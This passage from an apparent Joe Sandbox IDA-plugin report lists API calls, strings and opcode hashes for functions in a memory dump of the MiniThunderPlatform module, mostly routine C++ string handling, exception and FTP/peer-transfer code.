                                                                                                                                                • Part of subcall function 100392B0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,00000000,?,?), ref: 100392E3
                                                                                                                                                • Part of subcall function 100392B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100392F5
                                                                                                                                                • Part of subcall function 100392B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10039325
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 10039737
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10039775
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$V?$basic_string@$??$???1?$basic_string@D@1@@std@@D@2@@0@0@$?str@?$basic_stringstream@D@2@@2@D@std@@@std@@$??$?6??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@D?$basic_stringstream@D@std@@@0@H_prologV01@V01@@V10@V?$basic_ostream@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1295690267-0
                                                                                                                                              • Opcode ID: d9b51d2d88036aad5f8f8e756a9373e9c1d33e7e05973336e1a745b6ccce354a
                                                                                                                                              • Instruction ID: 28b8b61647e6984404c96e6d56a1ae7cebf4f396d53a53ae089109537e2e6fad
                                                                                                                                              • Opcode Fuzzy Hash: d9b51d2d88036aad5f8f8e756a9373e9c1d33e7e05973336e1a745b6ccce354a
                                                                                                                                              • Instruction Fuzzy Hash: ED31C0325083909FD321DB54CC48B9BB7E8EBA9B11F000B2DF889872D0DB745908CBA3
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100753FE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10075434
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007545C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007546F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075479
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075491
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100754BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100754E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?assign@?$basic_string@V12@$V12@@$??1?$basic_string@H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1493581078-0
                                                                                                                                              • Opcode ID: 5dd1af1d9ddafce26f62a2ec0bebc6894490056c7a4623e5a00a965a1d13d7aa
                                                                                                                                              • Instruction ID: 4fc214b235942c380add411db8cc1888adbd99cd323bb96fab9617295d3da80a
                                                                                                                                              • Opcode Fuzzy Hash: 5dd1af1d9ddafce26f62a2ec0bebc6894490056c7a4623e5a00a965a1d13d7aa
                                                                                                                                              • Instruction Fuzzy Hash: 8E311375501788DFCB25CF68C988BEABBF4BF18710F04465EE8AA93251DB70A944CB20
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator), ref: 1003808F
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100380A1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100380BD
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 100380DA
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100382F6
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10038086
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 4098190477-152884079
                                                                                                                                              • Opcode ID: ca1e4bae6b6a22e69f1790565d54caba7422d35d46cd9ef12e65d862496dcc70
                                                                                                                                              • Instruction ID: 7da3ae295956b25448933cfffff3b02447314159fe9d450c3c013d71921d1bff
                                                                                                                                              • Opcode Fuzzy Hash: ca1e4bae6b6a22e69f1790565d54caba7422d35d46cd9ef12e65d862496dcc70
                                                                                                                                              • Instruction Fuzzy Hash: FDA17B742083818FC716CF28C4A0A56BBE5FF56245F6989DCE8954F312C771EE4ACBA1
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001917B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?,?), ref: 1001919A
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(102B24A0), ref: 100191C0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100193D1
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100193D8
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10019192
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@H_prolog$??0exception@@??1?$basic_string@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 3264262834-152884079
                                                                                                                                              • Opcode ID: e98512b758acd1794490c0c23525a54fb50e5fc3c14b26c891a912a513f745c5
                                                                                                                                              • Instruction ID: 735f214222b3376b98e661e17ef82e2b8c6c5195e426eac30458e8fd067629d4
                                                                                                                                              • Opcode Fuzzy Hash: e98512b758acd1794490c0c23525a54fb50e5fc3c14b26c891a912a513f745c5
                                                                                                                                              • Instruction Fuzzy Hash: 65A13670908291AFD725CB64C094B98BFE2FF46344F29809DD9998F292D7B2ECC5CB50
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10019716
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?,?,102768A4), ref: 10019735
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 1001975B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,102768A4), ref: 1001996C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 10019973
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 1001972D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@H_prolog$??0exception@@??1?$basic_string@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 3264262834-152884079
                                                                                                                                              • Opcode ID: 18a3cbdd0f905a62e53045f924cd3ca3140af4b5bb54afc99ced22293c1f67a6
                                                                                                                                              • Instruction ID: 934e4a69c5983ee14dc4701616ce8d4edd983f705f610ce9dee54942593e48f5
                                                                                                                                              • Opcode Fuzzy Hash: 18a3cbdd0f905a62e53045f924cd3ca3140af4b5bb54afc99ced22293c1f67a6
                                                                                                                                              • Instruction Fuzzy Hash: 1AA13A74A082819FD741CF28C0D4B99BBE6EF46354FA9909CD48A4F6A2C771ECC5CB51
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000001), ref: 100B4325
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(00000000,00000000), ref: 1007E403
                                                                                                                                                • Part of subcall function 1007E380: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007E41A
                                                                                                                                                • Part of subcall function 1007E380: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007E485
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?), ref: 1007E4FE
                                                                                                                                                • Part of subcall function 1007E380: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1007E513
                                                                                                                                                • Part of subcall function 1007E380: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007E525
                                                                                                                                                • Part of subcall function 1007E380: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007E534
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,00000000), ref: 100B42C0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100B42F6
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                                • Part of subcall function 100B2320: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                                • Part of subcall function 100B2320: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                                • Part of subcall function 100B1540: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_dphub_res,?), ref: 100B1622
                                                                                                                                                • Part of subcall function 100B1540: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B1651
                                                                                                                                                • Part of subcall function 100B1540: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes_from_nondphub_res), ref: 100B1660
                                                                                                                                                • Part of subcall function 100B1540: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000000), ref: 100B169F
                                                                                                                                                • Part of subcall function 100B3A20: __RTDynamicCast.MSVCR71(?,00000000,103010A4,103010CC,00000000,?,?,?), ref: 100B3A86
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@$??$?8D@1@@std@@V?$basic_string@$D@2@@0@$CastD@2@@0@0@DynamicH_prologV01@@
                                                                                                                                              • String ID: -1 == _exit_state$.\p2s_task_event_handler.cpp$thunder_assert
                                                                                                                                              • API String ID: 4102141786-1101966026
                                                                                                                                              • Opcode ID: 82726282dad65c50140c188e0101c2189b5224b5c73e2698c1e7421e98aea3d4
                                                                                                                                              • Instruction ID: 50fa3eb72d89b31d591c5a0a5fa0c776cec88d025345920ecbc5af57987afb2e
                                                                                                                                              • Opcode Fuzzy Hash: 82726282dad65c50140c188e0101c2189b5224b5c73e2698c1e7421e98aea3d4
                                                                                                                                              • Instruction Fuzzy Hash: 8E517A782047409FD714DF64C895BABB7E5FF89744F04090CF99A87392DB74A909CB62
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(1027DEE0,?,?,?,?,?,?,?,?,?,?,?,?,?,1024495F,000000FF), ref: 100502CE
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,100507A0), ref: 10050322
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1005035B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?), ref: 10050380
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1005039B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?), ref: 100503BD
                                                                                                                                                • Part of subcall function 1021ADD0: WaitForSingleObject.KERNEL32(?,000000FF,?,10035F03,?,?), ref: 1021ADE5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CriticalDeleteSection$ObjectSingleWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4287628598-0
                                                                                                                                              • Opcode ID: dd391b9e3e40d7fb6a3693f0ac732bd256af0d0e9b3700218e61569a86700ca5
                                                                                                                                              • Instruction ID: 37c0fefbd7fa45fd5a3b716990013d133868753b0abaa8172d990299f2dff57f
                                                                                                                                              • Opcode Fuzzy Hash: dd391b9e3e40d7fb6a3693f0ac732bd256af0d0e9b3700218e61569a86700ca5
                                                                                                                                              • Instruction Fuzzy Hash: 4D515AB56047419FCB10CF58C884A9ABBE4FF48300F54896DF8AA8B352D775E949CB92
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1009D307
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$_data_reader != NULL$false$operation_ptr == _data_operation$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102780D0), ref: 100A1668
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A167F
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1009D446
                                                                                                                                                • Part of subcall function 1009D410: ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1009D45A
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027E6E8), ref: 1009D470
                                                                                                                                                • Part of subcall function 1009D410: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1009D47B
                                                                                                                                                • Part of subcall function 1009D410: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 1009D48A
                                                                                                                                                • Part of subcall function 1009D410: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,USER), ref: 1009D49C
                                                                                                                                                • Part of subcall function 1009D410: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(USER ******), ref: 1009D4AE
                                                                                                                                                • Part of subcall function 1009D410: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009D4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A16A4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A16B6
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$D@1@@std@@D@2@@0@V01@V?$basic_string@Y?$basic_string@$??$?8??$?9?append@?$basic_string@V01@@V12@V12@@
                                                                                                                                              • String ID: PBSZ
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100ED654
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(peer://,?,?), ref: 100ED675
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?), ref: 100ED681
                                                                                                                                              • strncmp.MSVCR71(?,?,00000010), ref: 100ED6B0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100ED6CC
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??$?8??0?$basic_string@??1?$basic_string@D@1@@std@@D@2@@0@0@H_prologV?$basic_string@strncmp
                                                                                                                                              • String ID: peer://
                                                                                                                                              APIs
